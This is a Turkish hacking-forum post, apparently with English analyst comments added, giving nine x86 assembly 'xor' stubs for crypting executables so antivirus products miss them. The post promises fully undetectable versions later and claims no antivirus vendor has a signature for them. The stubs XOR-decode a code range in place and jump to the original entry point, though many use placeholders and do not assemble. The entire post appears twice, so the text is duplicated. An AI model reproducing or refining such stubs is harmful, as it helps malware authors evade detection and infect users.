UD yapımı için gerekli olan xor kodlarını veriyorum, buyrun.
Bunlarla FUD bile yapılır ama ilerleyen vakitlerde onları da göstericez arkadaşlar; şu an temellerini öğrenelim.
Cevap yazdığınız için teşekkürler.
1-xor
-------------------------
; Snippet 1: in-place single-byte XOR loop over {Anfang}..{Ende}, then a jump to OEP.
; Template only: {Anfang}/{Ende} (German: start/end) and OEP are placeholders the
; post never defines. Numeric literals are presumably hex (debugger notation) - confirm.
; Analyst notes:
;   - BL is the XOR key. It is built from the constant 88 and from AL, and AL is
;     never set in this snippet, so the key depends on register state at entry.
;   - The only memory write besides the pushes is the XOR at L013; the range it
;     rewrites has to be writable at run time.
;   - The transformation is a fixed one-byte XOR: it alters how the range looks on
;     disk, not what is in memory once the loop has finished.
PUSHAD                  ; save all general-purpose registers
MOV BL,88               ; key seed
NEG BL
ROR BL,4
NOT BL
xor BL,AL               ; mixes in AL, which the snippet never initialises
NOT BL
ROR BL,4
NEG BL
PUSH 1                  ; pushed twice, never popped in this snippet
PUSH 1
MOV EAX,{Anfang}        ; EAX = pointer to the first byte of the range
INC BL                  ; final key adjustment before the loop
L013:
xor [BYTE DS:EAX],BL    ; XOR one byte in place with the key
INC EAX
DEC EAX
INC EAX                 ; INC/DEC/INC: net effect is EAX += 1
CMP EAX,{Ende}
JLE L013                ; signed compare; the byte at {Ende} is included
JMP OEP                 ; unconditional transfer to the placeholder OEP
; Not reached by fall-through: the JMP above is unconditional and nothing
; in the snippet targets these lines.
POPAD
PUSH 1
PUSH 1
2-xor
-------------------------
; Snippet 2: register/immediate pushes followed by a chain of calls.
; Contains no XOR and no memory write other than the pushes themselves.
; [ N.E.P ], [OEP] and [ CALL ] are the author's annotations/placeholders
; (presumably "new entry point", "original entry point" and a call target);
; as written this does not assemble.
; Analyst notes:
;   - Nothing here decodes data. Control leaves through CALL [ CALL ].
;   - Everything after that CALL runs only if the callee returns. ESI, EBX, ECX
;     and EAX are never loaded in the snippet, so the later CALL targets are
;     whatever those registers hold at that point.
PUSH EAX [ N.E.P ]
PUSH ECX
PUSH ESP
PUSH EBP
PUSH 24
PUSH 21
PUSH [OEP]
CALL [ CALL ]
PUSH ESI
PUSH EBX
CALL ESI
CALL EBX
CALL ESP                ; target is the stack pointer value, i.e. an address on the stack
CALL ECX
CALL EAX
PUSH 20
RETN                    ; pops the value just pushed and uses it as the return address
3-xor
-------------------------
; Snippet 3: two decrements, a standard frame setup, pushes, then a placeholder CALL.
; Contains no XOR and no memory write other than the pushes.
; Parenthesised operands are placeholders: (DEC ECX)/(DEC EAX) presumably stand
; for the addresses of those instructions, "Anfang" is German for "start".
; As written this does not assemble.
DEC ECX
DEC EAX
PUSH EBP                ; conventional frame prologue
MOV EBP,ESP
PUSH (DEC ECX)
PUSH 99
PUSH 11
PUSH (DEC EAX)
PUSH (Anfang PUSH )
CALL (Anfang CALL )     ; the only control transfer; nothing follows it in the snippet
4-xor
-------------------------
; Snippet 4: pushes, a placeholder call to the original entry point, then
; register-only arithmetic and further calls.
; The two XORs operate on registers only (EAX/EDI and CH/DH); no memory is
; modified apart from the pushes. Parenthesised operands are placeholders and
; the snippet does not assemble as written.
; Analyst notes:
;   - Control leaves at CALL(orginal call entrypoint); the rest runs only if
;     that call returns.
;   - CALL EAX / ESI / EBX / ESP use register values the snippet does not set
;     up in any visible way (EAX was only negated).
PUSH ESP
PUSH EBP
PUSH EDX
PUSH ECX
NEG EAX
PUSH(Orginal entrypoint)
CALL(orginal call entrypoint)
XCHG DH, CH             ; swap the two byte registers
PUSH 3788
PUSH 3764
PUSH 3768
PUSH 3772
PUSH 3531
CALL EAX
CALL ESI
CALL EBX
NOT EAX
xor EAX,EDI             ; register-only
xor CH,DH               ; register-only
INC ESI
DEC EBP
CALL ESP                ; target is the stack pointer value
JMP (xor EAX,EDI entrypoint)    ; unconditional jump back to the xor EAX,EDI line (placeholder)
; Not reached by fall-through: the JMP above is unconditional.
JLE (xor CH,DH Entrypoint)
ROR AL,6
NOT EAX
PUSH 0
RETN                    ; would pop the 0 just pushed as the return address
5-xor
-------------------------
; Snippet 5: call-through-pointer wrapper. Despite the heading it contains no XOR.
; Offsets are hex (the +C displacement only reads as hex).
; Stack layout read by the code, relative to EBP after the prologue:
;   [EBP+8]  = function pointer to call
;   [EBP+C], [EBP+10], [EBP+14] = three dword arguments forwarded to it
; Saves EBP/ESI/EDI/EBX, forwards the three arguments, calls the pointer,
; restores the registers and returns, discarding its own four dword slots.
PUSH EBP
MOV EBP, ESP
PUSH ESI
PUSH EDI
PUSH EBX
MOV ESI, ESP                    ; remember ESP so the stack can be restored after the call
PUSH DWORD PTR SS:[EBP+14]      ; arguments pushed last-to-first
PUSH DWORD PTR SS:[EBP+10]
PUSH DWORD PTR SS:[EBP+C]
CALL NEAR DWORD PTR SS:[EBP+8]  ; indirect call through the pointer passed by the caller
MOV ESP, ESI                    ; restores ESP whether or not the callee removed its arguments;
                                ; assumes the callee preserved ESI - confirm for the target
POP EBX
POP EDI
POP ESI
POP EBP
RETN 10                         ; hex 10 = 16 bytes: the four slots at [EBP+8]..[EBP+14]
6-xor
-------------------------
; Snippet 6: in-place single-byte XOR loop over (First)..(Last), then a transfer
; to the placeholder OEP. Template only; parenthesised operands are placeholders.
; Analyst notes:
;   - BL is zeroed and incremented once before the memory XOR, so the key is 1
;     on the first pass. "jle (xor)" does not say which instruction is the loop
;     target, so whether the key stays constant cannot be told from the post.
;   - The only memory write besides the push is the XOR; the range it rewrites
;     has to be writable at run time.
xor bl,bl                       ; BL = 0
mov eax,(First)                 ; EAX = pointer to the first byte of the range
inc bl                          ; BL = 1
xor byte ptr ds:[eax],bl        ; XOR one byte in place with BL
inc eax
cmp eax,(Last)
jle (xor)                       ; signed compare; loops while EAX <= (Last)
Push (OEP)
Call (JMP or CALL)              ; author leaves the choice of transfer instruction open
7-xor
-------------------------
; Snippet 7: eight ADD-to-memory lines, register zeroing, then a placeholder
; push/call of "oep". The XORs only zero BL and CL; nothing is decoded.
; Analyst notes:
;   - "ADD BYTE PTR DS:[EAX], AL" is how a disassembler renders the byte pair
;     00 00, so the leading ADD lines are likely padding/data that was copied
;     as if it were code - confirm against the original bytes.
;   - If executed as instructions they write through EAX, which the snippet
;     never sets.
ADD BYTE PTR DS:[EAX], AL
ADD BYTE PTR DS:[EAX], AL
ADD BYTE PTR DS:[EAX], AL
ADD BYTE PTR DS:[EAX], CH
ADD BYTE PTR DS:[EAX], DH
ADD BYTE PTR DS:[EAX], DH
ADD BYTE PTR DS:[EAX], DH
ADD BYTE PTR DS:[EAX], DH
dec ecx
push ecx
push eax
xor bl,bl                       ; BL = 0
xor cl,cl                       ; CL = 0
push 414
push oep                        ; placeholder for the original entry point
call oep                        ; control leaves here; the rest runs only if it returns
dec ecx
xor bl,bl
retn
8-xor
-------------------------
; Snippet 8: a compare, pushes and a placeholder CALL. Despite the heading it
; contains no XOR and no memory write other than the pushes.
; (o.e.p) and (call) are placeholders; the snippet does not assemble as written.
CMP AX,8                ; sets flags only; no conditional instruction follows to use them
PUSH EAX
MOV EAX,EBP
PUSH (o.e.p)
PUSH 88
PUSH 77
PUSH (o.e.p)
CALL (call)             ; the only control transfer in the snippet
9-xor
-------------------------
; Snippet 9: register-only arithmetic ending in a jump to the placeholder start
; entry point ("Baslangıc" = start). The XORs touch registers only; no memory is
; modified apart from the single push. Does not assemble as written.
; Analyst notes:
;   - Both XOR results are overwritten or unused: EAX is reloaded by the POP
;     that follows, and EDX is not read again.
;   - Only one dword is pushed but two are popped, so the second POP consumes
;     a value that was on the stack before the snippet ran.
PUSH ESP
xor EAX,ESI
POP EAX                 ; EAX = the ESP value pushed above; discards the XOR result
INC EAX
xor EDX,ESP
POP EAX                 ; pops a dword the snippet did not push
NOT EAX
ADD EAX,ESI
JMP (Baslangıc.E.P)     ; unconditional transfer to the placeholder entry point
; Not reached by fall-through: the JMP above is unconditional.
PUSH 4
SUB EAX, 6
JLE (xor EAX,ESI)değeri ; placeholder: address of the xor EAX,ESI line ("değeri" = its value)
RETN
Not : Hiçbir antivirüs firmasında imzası bulunmamaktadır.
Bunlarla FUD bile yapılır ama ilerleyen vakitlerde onları da göstericez arkadaşlar; şu an temellerini öğrenelim.
Cevap yazdığınız için teşekkürler.
1-xor
-------------------------
; Snippet 1: in-place single-byte XOR loop over {Anfang}..{Ende}, then a jump to OEP.
; Template only: {Anfang}/{Ende} (German: start/end) and OEP are placeholders the
; post never defines. Numeric literals are presumably hex (debugger notation) - confirm.
; Analyst notes:
;   - BL is the XOR key. It is built from the constant 88 and from AL, and AL is
;     never set in this snippet, so the key depends on register state at entry.
;   - The only memory write besides the pushes is the XOR at L013; the range it
;     rewrites has to be writable at run time.
;   - The transformation is a fixed one-byte XOR: it alters how the range looks on
;     disk, not what is in memory once the loop has finished.
PUSHAD                  ; save all general-purpose registers
MOV BL,88               ; key seed
NEG BL
ROR BL,4
NOT BL
xor BL,AL               ; mixes in AL, which the snippet never initialises
NOT BL
ROR BL,4
NEG BL
PUSH 1                  ; pushed twice, never popped in this snippet
PUSH 1
MOV EAX,{Anfang}        ; EAX = pointer to the first byte of the range
INC BL                  ; final key adjustment before the loop
L013:
xor [BYTE DS:EAX],BL    ; XOR one byte in place with the key
INC EAX
DEC EAX
INC EAX                 ; INC/DEC/INC: net effect is EAX += 1
CMP EAX,{Ende}
JLE L013                ; signed compare; the byte at {Ende} is included
JMP OEP                 ; unconditional transfer to the placeholder OEP
; Not reached by fall-through: the JMP above is unconditional and nothing
; in the snippet targets these lines.
POPAD
PUSH 1
PUSH 1
2-xor
-------------------------
; Snippet 2: register/immediate pushes followed by a chain of calls.
; Contains no XOR and no memory write other than the pushes themselves.
; [ N.E.P ], [OEP] and [ CALL ] are the author's annotations/placeholders
; (presumably "new entry point", "original entry point" and a call target);
; as written this does not assemble.
; Analyst notes:
;   - Nothing here decodes data. Control leaves through CALL [ CALL ].
;   - Everything after that CALL runs only if the callee returns. ESI, EBX, ECX
;     and EAX are never loaded in the snippet, so the later CALL targets are
;     whatever those registers hold at that point.
PUSH EAX [ N.E.P ]
PUSH ECX
PUSH ESP
PUSH EBP
PUSH 24
PUSH 21
PUSH [OEP]
CALL [ CALL ]
PUSH ESI
PUSH EBX
CALL ESI
CALL EBX
CALL ESP                ; target is the stack pointer value, i.e. an address on the stack
CALL ECX
CALL EAX
PUSH 20
RETN                    ; pops the value just pushed and uses it as the return address
3-xor
-------------------------
; Snippet 3: two decrements, a standard frame setup, pushes, then a placeholder CALL.
; Contains no XOR and no memory write other than the pushes.
; Parenthesised operands are placeholders: (DEC ECX)/(DEC EAX) presumably stand
; for the addresses of those instructions, "Anfang" is German for "start".
; As written this does not assemble.
DEC ECX
DEC EAX
PUSH EBP                ; conventional frame prologue
MOV EBP,ESP
PUSH (DEC ECX)
PUSH 99
PUSH 11
PUSH (DEC EAX)
PUSH (Anfang PUSH )
CALL (Anfang CALL )     ; the only control transfer; nothing follows it in the snippet
4-xor
-------------------------
; Snippet 4: pushes, a placeholder call to the original entry point, then
; register-only arithmetic and further calls.
; The two XORs operate on registers only (EAX/EDI and CH/DH); no memory is
; modified apart from the pushes. Parenthesised operands are placeholders and
; the snippet does not assemble as written.
; Analyst notes:
;   - Control leaves at CALL(orginal call entrypoint); the rest runs only if
;     that call returns.
;   - CALL EAX / ESI / EBX / ESP use register values the snippet does not set
;     up in any visible way (EAX was only negated).
PUSH ESP
PUSH EBP
PUSH EDX
PUSH ECX
NEG EAX
PUSH(Orginal entrypoint)
CALL(orginal call entrypoint)
XCHG DH, CH             ; swap the two byte registers
PUSH 3788
PUSH 3764
PUSH 3768
PUSH 3772
PUSH 3531
CALL EAX
CALL ESI
CALL EBX
NOT EAX
xor EAX,EDI             ; register-only
xor CH,DH               ; register-only
INC ESI
DEC EBP
CALL ESP                ; target is the stack pointer value
JMP (xor EAX,EDI entrypoint)    ; unconditional jump back to the xor EAX,EDI line (placeholder)
; Not reached by fall-through: the JMP above is unconditional.
JLE (xor CH,DH Entrypoint)
ROR AL,6
NOT EAX
PUSH 0
RETN                    ; would pop the 0 just pushed as the return address
5-xor
-------------------------
; Snippet 5: call-through-pointer wrapper. Despite the heading it contains no XOR.
; Offsets are hex (the +C displacement only reads as hex).
; Stack layout read by the code, relative to EBP after the prologue:
;   [EBP+8]  = function pointer to call
;   [EBP+C], [EBP+10], [EBP+14] = three dword arguments forwarded to it
; Saves EBP/ESI/EDI/EBX, forwards the three arguments, calls the pointer,
; restores the registers and returns, discarding its own four dword slots.
PUSH EBP
MOV EBP, ESP
PUSH ESI
PUSH EDI
PUSH EBX
MOV ESI, ESP                    ; remember ESP so the stack can be restored after the call
PUSH DWORD PTR SS:[EBP+14]      ; arguments pushed last-to-first
PUSH DWORD PTR SS:[EBP+10]
PUSH DWORD PTR SS:[EBP+C]
CALL NEAR DWORD PTR SS:[EBP+8]  ; indirect call through the pointer passed by the caller
MOV ESP, ESI                    ; restores ESP whether or not the callee removed its arguments;
                                ; assumes the callee preserved ESI - confirm for the target
POP EBX
POP EDI
POP ESI
POP EBP
RETN 10                         ; hex 10 = 16 bytes: the four slots at [EBP+8]..[EBP+14]
6-xor
-------------------------
; Snippet 6: in-place single-byte XOR loop over (First)..(Last), then a transfer
; to the placeholder OEP. Template only; parenthesised operands are placeholders.
; Analyst notes:
;   - BL is zeroed and incremented once before the memory XOR, so the key is 1
;     on the first pass. "jle (xor)" does not say which instruction is the loop
;     target, so whether the key stays constant cannot be told from the post.
;   - The only memory write besides the push is the XOR; the range it rewrites
;     has to be writable at run time.
xor bl,bl                       ; BL = 0
mov eax,(First)                 ; EAX = pointer to the first byte of the range
inc bl                          ; BL = 1
xor byte ptr ds:[eax],bl        ; XOR one byte in place with BL
inc eax
cmp eax,(Last)
jle (xor)                       ; signed compare; loops while EAX <= (Last)
Push (OEP)
Call (JMP or CALL)              ; author leaves the choice of transfer instruction open
7-xor
-------------------------
; Snippet 7: eight ADD-to-memory lines, register zeroing, then a placeholder
; push/call of "oep". The XORs only zero BL and CL; nothing is decoded.
; Analyst notes:
;   - "ADD BYTE PTR DS:[EAX], AL" is how a disassembler renders the byte pair
;     00 00, so the leading ADD lines are likely padding/data that was copied
;     as if it were code - confirm against the original bytes.
;   - If executed as instructions they write through EAX, which the snippet
;     never sets.
ADD BYTE PTR DS:[EAX], AL
ADD BYTE PTR DS:[EAX], AL
ADD BYTE PTR DS:[EAX], AL
ADD BYTE PTR DS:[EAX], CH
ADD BYTE PTR DS:[EAX], DH
ADD BYTE PTR DS:[EAX], DH
ADD BYTE PTR DS:[EAX], DH
ADD BYTE PTR DS:[EAX], DH
dec ecx
push ecx
push eax
xor bl,bl                       ; BL = 0
xor cl,cl                       ; CL = 0
push 414
push oep                        ; placeholder for the original entry point
call oep                        ; control leaves here; the rest runs only if it returns
dec ecx
xor bl,bl
retn
8-xor
-------------------------
; Snippet 8: a compare, pushes and a placeholder CALL. Despite the heading it
; contains no XOR and no memory write other than the pushes.
; (o.e.p) and (call) are placeholders; the snippet does not assemble as written.
CMP AX,8                ; sets flags only; no conditional instruction follows to use them
PUSH EAX
MOV EAX,EBP
PUSH (o.e.p)
PUSH 88
PUSH 77
PUSH (o.e.p)
CALL (call)             ; the only control transfer in the snippet
9-xor
-------------------------
; Snippet 9: register-only arithmetic ending in a jump to the placeholder start
; entry point ("Baslangıc" = start). The XORs touch registers only; no memory is
; modified apart from the single push. Does not assemble as written.
; Analyst notes:
;   - Both XOR results are overwritten or unused: EAX is reloaded by the POP
;     that follows, and EDX is not read again.
;   - Only one dword is pushed but two are popped, so the second POP consumes
;     a value that was on the stack before the snippet ran.
PUSH ESP
xor EAX,ESI
POP EAX                 ; EAX = the ESP value pushed above; discards the XOR result
INC EAX
xor EDX,ESP
POP EAX                 ; pops a dword the snippet did not push
NOT EAX
ADD EAX,ESI
JMP (Baslangıc.E.P)     ; unconditional transfer to the placeholder entry point
; Not reached by fall-through: the JMP above is unconditional.
PUSH 4
SUB EAX, 6
JLE (xor EAX,ESI)değeri ; placeholder: address of the xor EAX,ESI line ("değeri" = its value)
RETN
Not : Hiçbir antivirüs firmasında imzası bulunmamaktadır.